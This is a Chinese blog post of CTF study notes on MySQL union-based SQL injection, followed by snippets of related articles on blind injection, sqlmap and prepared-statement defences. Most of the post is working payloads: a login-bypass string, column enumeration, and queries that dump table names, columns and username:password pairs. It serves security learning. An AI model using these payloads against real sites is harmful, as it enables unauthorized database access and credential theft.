【CTF】SQL 注入 总结

最新推荐文章于 2025-10-23 22:15:00 发布
原创 最新推荐文章于 2025-10-23 22:15:00 发布 · 1.1k 阅读 · 11 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #mysql #sql #sql注入 #安全

【CTF】SQL 注入 总结

一、SQL 注入 思路

字段
回显



flag

1.万能密码登陆
2.登陆后,使用联合查询注入
3.爆字段
4.看回显
4.爆数据库
3.爆数据库的表
4.爆出表的列
5.爆出flag

输入框的#,直接使用hackbar地址栏,需将#进行URL编码,即替换为%23

order by 爆字段,到4报错,有4-1,即3个字段

1' order by 1 #
1' order by 2 #
1' order by 3 #
1' order by 4 #

union联合查询判断回显,在哪显示数据,就在哪替换命令

1' union select 1,2,3 #

3

爆库

1' union select 1,2,version() #

VERSION

1' union select 1,2,database() #

DATABASE,DATABASE1

爆库的表

只有一个数据库,省事直接相等

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #

多个数据库,选择一个

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='DATABASE'

AAA,BBB,CCC

爆库表的列

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='AAA' #

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='BBB' # 

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='CCC' #

id,username,password

读取内容,爆flag

1' union select 1,2,group_concat(id,username,password) from AAA #

id,username,password

1' union select 1,2,group_concat(username,0x3a,password) from AAA#

username:password,username:password

精简版

爆字段

1' order by 1 #
1' order by 2 #
1' order by 3 #

1' order by 1 %23
1' order by 2 %23
1' order by 3 %23

看回显

1' union select 1,2,3 #

爆数据库

1' union select 1,database(),version() #

DATABASE,VERSION

5.爆数据库的表

只有一个数据库,省事直接相等

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #

多个数据库,选择一个

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='DATABASE'

AAA,BBB,CCC

6.爆出表的列

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='AAA' #

7.读取内容,爆flag

读AAA表

1' union select 1,2,group_concat(id,username,password) from AAA%23&password=1

可以加ASCII码方便区别

1' union select 1,2,group_concat(username,0x40,password) from AAA%23&password=1

二、SQL 注入 类型

三、技巧

万能密码

admin’ or 1=1 #

常见URL编码

#%23

常用ASCII码

0x3a
:
0x40 @

https://www.litefeel.com/tools/ascii.php

四、工具

1、hackbar

快捷键
Ctrl + Enter 执行

2、sqlmap

3、脚本

五、绕过

未完成待补充整理…

CTFSQL注入(get)
YkingH的博客
07-09 1020
CTF—WEB—SQL注入 SQL注入漏洞介绍 sql注入攻击指的是构建特殊的输入作为参数传入Web应用程序,而这些输入大都是sql语法里的一些组合,通过执行sql语句而执行攻击者所要的操作,其主要原因是程序没有细致的过滤用户输入的数据,致使非法数据侵入系统。 sql注入产生的原因,通常表现在: 不当的类型处理 不安全数据库配置 不合理的查询集处理 不当的错误处理 转义字符处理不合适 多个提交处理不当 信息探测 扫描主机服务信息及服务版本 nmap -sV 靶机ip地址 快速扫描主机全部信息 nmap
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 4525
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
CTF-SQL注入总结
SWC0619的博客
03-11 8608
SQL注入总结(一)
干货 | SQL 注入思路总结(非常详细):小白也能跟学,从判断漏洞到获取数据,零基础入门到精通,收藏备用!
Button12138的博客
10-23 1693
SQL注入是服务器端未严格校验客户端发送的数据,而导致服务端SQL语句被恶意修改并成功执行的行为称为SQL注入
[BSidesSF2019]blink(CTF-Tools)
热门推荐
寻梦&之璐
05-14 3万+
[BSidesSF2019]blink byte[] v3 = Base64.decode(" data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/2wBDAQMDAwQDBAgEBAgQCwkLEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEB
CTF-SQL注入
weixin_44770698的博客
06-16 5788
CTF-SQL注入题目整理
CTF学习笔记——SQL注入
xuanyulevel6的博客
08-25 6608
以pikachu靶场练习来学习ctf知识
[CTF] SQL注入的一些经验总结(未完待续)【更新:2022.11.25】
ZXW_NUDT的博客
11-17 6583
关于SQL注入的思维导图可以点开看一下大图
CTF-WEB总结之SQL注入
weixin_41038905的博客
05-01 840
简介 SQL注入漏洞的原理是由于开发者在编写操作数据库代码时,直接将外部可控的参数拼接到SQL语句中,没有经过任何过滤或过滤不严谨,导致攻击者可以使恶意语句在数据库引擎中执行。 Union注入 利用内置函数爆数据库信息及相关信息 version() database() user() current_user() @@datadir数据库路径 @@basedir mysql安装路径 @@ver...
CTF-Web学习笔记:SQL注入
Deng7326的博客
07-28 1419
本文系统梳理了CTF竞赛中SQL注入的核心原理与实战技巧。首先介绍了SQL注入的基础概念和成因,即用户输入数据被直接拼接到SQL语句中执行。其次分类解析了CTF常见的注入类型,包括数字/字符串型注入、报错/盲注/联合查询等攻击方式。文章重点分享了实战经验:如何判断注入点、确定数据库类型、使用工具辅助及绕过WAF防御。最后通过一道报错注入题目,详细演示了从数据库名获取到最终拿Flag的完整解题流程,并推荐了SQLiLabs等练习平台。
总结笔记-CTF-SQL注入
qq_39283174的博客
12-22 617
关于SQL注入的相关CTF笔记
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
CTF常用sql注入(一)联合注入和宽字节
2301_81040377的博客
07-04 765
给自己总结一下sql注入的常用姿势吧,记录一下学习。
CTF--SQL注入
woshisz0413的博客
11-27 516
SQL注入思路: 1.是否存在SQL注入测试方法:(1)使用单引号’ (2)sqlmap:sqlmap.py -u http://******* 2.判断过滤的字符 SQL注入方式: (1)单引号’ (2)or/and 1=1 (3)order by --猜测字段长度 (&&与||绕过过滤) 例:order by 1… SQL绕过过滤方式: (1)某一关键字被过滤:1...
CTF入门笔记之SQL注入
qq_37410729的博客
11-01 3379
sql注入
CTF入门之SQL注入
PolarPeak的博客
12-08 2609
一、字符型注入 <?php require_once('../header.php'); require_once('db.php'); $sql = "SELECT * FROM users where name = '"; $sql .= $_GET['name']."'"; $result = mysql_query($sql); if($result) { ?> <?php while ($row = mysql_fetch_assoc($result)){ echo
CTF-Web SQL注入
weixin_52182264的博客
04-26 5577
sql注入基本情况了解 联合查询注入union 报错注入 一.sql注入基本信息 1. sql注入方式 常见的主要分为三种: 1. 联合查询注入(union) 2. 报错注入 3. 盲注(布尔盲注,时间盲注) 2.注入点提交方式 GET注入 提交数据的方式是GET,注入点的位置在GET参数部分。比如有这样的一个链接 http://xxx.com/news.php?id=1 , id 是注入点,一般注入点是url为主。 POST注入 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单
CTF-Web学习笔记——简单SQL注入(一)
weixin_55914379的博客
01-07 1205
SQL注入之简单手注
CTF-10.sql注入(get)
woo233的博客
09-19 668
SQL注入攻击指的是通过构建特殊的输入作为参数传入web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。SQL注入的产生原因通常表现在以下几方面:①不当的类型处理;②不安全数据库配置;③不合理的查询集处理;④不当的错误处理;⑤转义字符处理不合适;⑥多个提交处理不当。
ctfsql注入
最新发布
12-23
CTF(Capture The Flag)比赛中,SQL注入是常见且重要的考点。 ### SQL注入基础概念 SQL注入是指攻击者通过在应用程序的输入字段中插入恶意的SQL代码,从而改变原本的SQL语句逻辑,达到非法获取、修改或删除数据库中数据的目的。例如,一个简单的登录表单,如果没有对用户输入进行严格的过滤,攻击者就可以通过输入特殊的SQL语句绕过登录验证。 ### 常见的SQL注入类型 1. **基于错误的注入**:利用数据库返回的错误信息来获取数据库结构和数据。例如,在MySQL中,如果执行了一个错误的SQL语句,数据库会返回详细的错误信息,攻击者可以根据这些信息推断出表名、列名等。以下是一个简单的示例,假设存在一个存在注入漏洞的查询语句: ```sql SELECT * FROM users WHERE id = '$input'; ``` 攻击者可以输入 `1' OR 1=1; --`,这会使查询语句变为 `SELECT * FROM users WHERE id = '1' OR 1=1; --'`,由于`1=1`恒为真,后面的`--`是注释符号,会注释掉原语句的剩余部分,这样就可以绕过条件限制,查询出所有用户信息。 2. **盲注**:当应用程序没有返回详细的错误信息时,攻击者通过构造特定的SQL语句,根据页面返回的不同状态(如页面响应时间、页面内容是否变化等)来推断数据库中的信息。盲注又分为布尔盲注和时间盲注。 - **布尔盲注**:通过构造条件语句,根据页面的返回结果(如页面正常显示或报错)来判断条件是否为真。例如,构造 `1' AND (SELECT COUNT(*) FROM users) > 10; --`,如果页面正常显示,说明用户表中的记录数大于10;如果页面报错,说明记录数小于等于10。 - **时间盲注**:通过构造使数据库执行特定时间的延迟函数的SQL语句,根据页面响应时间来判断条件是否为真。例如,在MySQL中可以使用 `SLEEP()` 函数,构造 `1' AND IF((SELECT COUNT(*) FROM users) > 10, SLEEP(5), 0); --`,如果页面延迟5秒响应,说明用户表中的记录数大于10;如果页面立即响应,说明记录数小于等于10。 3. **联合查询注入**:当应用程序的SQL查询语句中存在可以使用`UNION`关键字的地方时,攻击者可以通过构造联合查询语句,将自己想要查询的信息与原查询结果合并返回。例如,原查询语句为 `SELECT id, username FROM users WHERE id = '$input';`,攻击者可以输入 `1 UNION SELECT database(), user(); --`,这样就可以获取当前数据库名和当前用户信息。 ### 检测SQL注入漏洞的方法 1. **手动测试**:通过在输入字段中输入一些常见的SQL注入测试字符,如单引号 `'`、双引号 `"`、分号 `;` 等,观察页面的响应情况。如果页面出现错误信息或显示异常,可能存在SQL注入漏洞。 2. **自动化工具**:使用一些专业的自动化漏洞扫描工具,如SQLMap。SQLMap可以自动检测和利用SQL注入漏洞,它可以检测多种数据库类型的注入漏洞,并可以获取数据库中的数据、表结构等信息。以下是使用SQLMap进行简单检测的命令示例: ```bash sqlmap -u "http://example.com/login.php?id=1" --batch ``` 其中,`-u` 后面跟的是存在注入嫌疑的URL,`--batch` 表示以批量模式运行,不进行交互询问。 ### 防范SQL注入的方法 1. **输入验证**:对用户输入进行严格的验证和过滤,只允许合法的字符输入。可以使用正则表达式来验证输入的格式是否符合要求。 2. **使用预处理语句**:在编写SQL语句时,使用数据库的预处理语句(如PHP中的PDO预处理语句),可以将SQL语句和用户输入的数据分开处理,避免SQL注入。以下是一个PHP PDO预处理语句的示例: ```php $pdo = new PDO('mysql:host=localhost;dbname=test', 'username', 'password'); $stmt = $pdo->prepare("SELECT * FROM users WHERE id = :id"); $id = $_GET['id']; $stmt->bindParam(':id', $id, PDO::PARAM_INT); $stmt->execute(); $result = $stmt->fetchAll(PDO::FETCH_ASSOC); ``` 3. **最小化数据库权限**:为应用程序分配最小的数据库操作权限,避免使用具有过高权限的数据库账户,这样即使发生SQL注入,攻击者所能获取和操作的数据也会受到限制。 ### 利用SQL注入CTF比赛中获取Flag 在CTF比赛中,Flag通常以某种形式存储在数据库中。攻击者可以通过SQL注入漏洞,使用上述的注入方法来获取数据库中的Flag信息。例如,通过联合查询注入将Flag信息与原查询结果合并返回,或者通过盲注逐步推断出Flag的内容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值